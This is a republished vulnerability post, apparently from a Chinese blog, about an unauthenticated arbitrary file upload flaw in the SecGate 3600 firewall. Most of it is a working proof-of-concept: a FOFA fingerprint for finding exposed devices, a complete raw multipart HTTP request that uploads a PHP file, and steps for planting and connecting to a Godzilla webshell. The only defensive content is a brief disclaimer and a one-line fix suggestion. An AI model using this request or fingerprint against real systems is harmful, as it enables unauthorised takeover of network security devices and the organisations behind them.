Arbitrary File Upload Vulnerability in SecGate 3600 Firewall

News 2023-08-11 21:44:29 views: null

Arbitrary File Upload Vulnerability in SecGate 3600 Firewall

Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.

1. Product Introduction

​ Wangshen SecGate3600 next-generation ultra-fast firewall (NSG series) is based on the mature and stable third-generation SecOS operating system of Netshen, which is completely independently developed and tested by the market, and is carefully developed on the basis of years of product experience in professional firewalls, VPNs, and IPS. The high-performance next-generation firewall is specially designed for the Internet egress of operators, governments, military, education, large enterprises, and small and medium-sized enterprises. Active defense intelligent security gateway with technology in one.

2. Vulnerability overview

​ There is an arbitrary file upload vulnerability in the obj_app_upfile interface of the SecGate 3600 firewall. Unauthorized attackers can upload arbitrary files through the vulnerability to obtain server permissions.

3. Scope of influence

​ Wangshen SecGate 3600 Firewall

4. Reproduction environment

FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="

insert image description here

5. Vulnerability recurrence

PoC

POST /?g=obj_app_upfile HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 574
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
 
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
 
10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: text/plain
 
马子
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"
 
obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="__hash__"
 
0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--

upload godzilla

insert image description here
verify url

https://your-ip/attachements/1.php

try to connect

insert image description here
insert image description here

Xiaolong POC detection:

insert image description here

6. Repair suggestions

Close the exposed surface of the Internet, and set up strong authentication for the file upload module.

Guess you like

Origin blog.csdn.net/holyxp/article/details/132229977
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com